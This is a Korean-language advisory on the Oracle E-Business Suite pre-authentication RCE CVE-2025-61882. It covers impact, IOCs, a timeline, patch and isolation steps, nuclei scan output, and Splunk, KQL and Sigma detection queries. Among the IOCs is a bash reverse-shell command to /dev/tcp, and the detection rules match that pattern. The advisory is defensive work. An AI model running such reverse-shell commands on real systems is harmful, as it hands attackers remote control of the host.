
CVE-2025-61882에 대한 상세 권고를 제공하며, 기술 분석, IOCs, 탐지 쿼리, 그리고 Oracle E-Business Suite 사전 인증 RCE를 위한 nuclei 기반 익스플로잇 템플릿을 포함합니다.
| 필드 | 세부 정보 |
|---|
| 🆔 CVE | CVE‑2025‑61882 |
| 🧾 제품 / 구성 요소 | Oracle E‑Business Suite (EBS) — Concurrent Processing / BI Publisher 통합 |
| 📦 영향받는 버전 | 12.2.3 → 12.2.14 |
| 🔢 CVSS (v3.1) | 9.8 (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H) |
| ⚠️ 유형 | 원격 코드 실행 (RCE) — 인증 불필요 |
| 🔥 실제 악용 여부 | 예 — 대규모 악용 / 갈취 캠페인 보고됨 |
| 📅 공개 / 타임라인 | 2025년 10월 (벤더 권고 + 공개 분석 문서). ([oracle.com][1]) |
(위 내용은 벤더 권고, NVD/CISA 및 여러 벤더 분석을 종합한 것입니다.) ([oracle.com][1])
| 영향 영역 | 의미 |
|---|---|
| 🔓 기밀성 | 공격자는 민감한 인사/재무/ERP 데이터를 읽을 수 있음 |
| 🛠️ 무결성 | 공격자는 레코드를 수정하거나, 백도어를 생성하거나, 구성을 변경할 수 있음 |
| ⚡ 가용성 | 공격자는 서비스를 중단시키거나, 랜섬웨어를 실행하거나, 백업을 파괴할 수 있음 |
| 🧭 위험 수준 | 극심함 — 중요 ERP 시스템의 사전 인증 RCE → 전체 도메인 장악 가능 |
높은 영향의 악용 및 랜섬웨어 연관성을 보고하는 참고 자료. ([Rapid7][2])
Oracle 및 사고 대응 기관이 IOC를 공개했습니다. 아래는 권고 및 벤더 분석 문서에 보고된 대표적인 예시입니다. 로그와 엔드포인트에서 이러한 패턴을 찾아보십시오. ([oracle.com][1])
| 유형 | 예시 |
|---|---|
| 🌐 IP (관찰됨) | 200.107.207.26, 185.181.60.11 (보고된 예시 주소) |
| 🧾 명령 패턴 | sh -c /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1 (리버스 셸) |
| 🗂️ 파일 해시 | 의심되는 악용 스크립트에 대한 여러 SHA‑256 해시 (전체 목록은 벤더 권고 참조) |
| 🕳️ 아티팩트 | 예상치 못한 웹 셸, 새로운 cronjob, 비정상적인 IP/포트로의 의심스러운 외부 연결 |
전체 IOC 목록 (IP, 전체 해시, 파일 이름)을 원하시면 여기에 붙여넣을 수 있습니다 — "IOC 붙여넣기"라고 말씀해 주세요. (링크 없음)
| 날짜 | 이벤트 |
|---|---|
| 2025년 8월 9일 | 실제 환경 악용 활동 최초 보고 (벤더 텔레메트리). ([crowdstrike.com][4]) |
| 2025년 10월 초 | Oracle이 EBS에 대한 보안 경고 / 패치 제공. ([oracle.com][1]) |
| 2025년 10월 6~7일 | CISA가 이 CVE를 KEV(알려진 악용 취약점) 카탈로그에 추가 (연방 기관 지침, 완화 기한). ([cisa.gov][5]) |
| 2025년 10월 (진행 중) | 여러 벤더 분석 문서 및 대규모 악용 보고 (CrowdStrike, Rapid7, Tenable 등). ([crowdstrike.com][4]) |
| 우선순위 | 조치 | 참고 / 샘플 세부 사항 |
|---|---|---|
| 1️⃣ 치명적 | 패치 영향받은 EBS 인스턴스 | 12.2.3–12.2.14 버전에 Oracle 보안 경고 패치를 즉시 적용하십시오. ([oracle.com][1]) |
| 2️⃣ 높음 | 격리 / 제한 EBS 웹 엔드포인트 접근 | EBS에 대한 인터넷 노출 HTTP/HTTPS를 차단하고, 신뢰할 수 있는 관리자 IP 또는 VPN만 허용하십시오. |
| 3️⃣ 높음 | WAF 규칙 활성화/조정 | 악용 패턴에 대한 벤더/커뮤니티 WAF 시그니처를 배포하고, 의심스러운 페이로드를 차단하십시오. ([Rapid7][2]) |
| 4️⃣ 높음 | 헌팅 및 탐지 | 리버스 셸 명령, 비정상적인 파일 쓰기, IOC로의 외부 연결을 로그에서 검색하십시오. |
| 5️⃣ 사고 대응 | 차단 및 대응 침해 발견 시 | 호스트 격리, 포렌식 증거 보존, 자격 증명 변경, 깨끗한 백업에서 재구축. |
| 6️⃣ 정책 | 보고 및 통지 | 규제/계약 요구 사항에 해당하는 경우 정책에 따라 이해관계자 및 당국에 통지하십시오 (CISA/KEV 지침 적용 가능). ([nvd.nist.gov][3]) |
┌──(kali㉿kali)-[~]
└─$ nuclei -u http://10.10.10.10:8000 -t CVE-2025-61882.yaml
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.10
projectdiscovery.io
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[INF] Scan completed in 485.722955ms. 1 matches found.
┌──(kali㉿kali)-[~]
└─$ nuclei -l targets.txt -t CVE-2025-61882.yaml
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.10
projectdiscovery.io
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 7
[INF] Running httpx on input host
[INF] Found 7 URL from httpx
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Mon, 02 Oct 2023 13:57:20 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sat, 31 Aug 2024 15:30:07 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Tue, 15 Aug 2023 16:58:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Fri, 30 Aug 2024 21:49:46 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sun, 16 May 2021 17:03:44 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http:/10.10.10.10:8000 ["Fri, 01 Sep 2023 13:20:35 GMT"]
[INF] Scan completed in 621.029991ms. 7 matches found.


Splunk (리버스 셸 패턴 검색):
index=web OR index=ebs_logs (uri_path="/cgi/*" OR uri_path="/xmlpserver/*")
| search "* /bin/bash -i * /dev/tcp/*" OR "*/dev/tcp/* 0>&1*"
| table _time host src_ip user uri_path _raw
ELK / Kibana (KQL):
http.request.body : "*bash -i*" or http.request.body : "* /dev/tcp/*"
Sigma 규칙 (개념적):
title: Oracle EBS Reverse Shell via HTTP
detection:
selection:
EventID: 1234
ProcessCommandLine|contains: "/dev/tcp/"
condition: selection
(로그 스키마에 맞게 필드 이름을 조정하십시오. IOC를 사용하여 정밀도를 높이십시오.)
80/443을 차단하고, 관리 VPN 및 특정 관리자 IP만 허용하십시오.bash -i, /dev/tcp/, base64 -d 또는 일반적인 악용 페이로드 패턴이 포함된 요청을 차단하십시오.(정확성을 위해 출처를 나열합니다 — 여기에 링크를 붙여넣지는 않지만 필요 시 참조할 수 있도록 벤더/기관 이름입니다.)
이 보고서에 제공된 정보는 인식 제고, 방어 및 교육 목적으로만 제공됩니다. 이 정보를 사용하여 명시적 승인 없이 시스템을 악용, 공격 또는 손상시키는 것은 불법이며 형사 및 민사 처벌을 초래할 수 있습니다.
🔒 항상 권장 패치를 적용하고, 보안 모범 사례를 따르며, 테스트는 통제된 환경에서만 수행하십시오.
🧾 이 보고서는 공식 벤더 권고를 대체하지 않습니다 — 확정적인 복구 지침은 항상 Oracle 보안 경고 및 공인된 지침을 참조하십시오.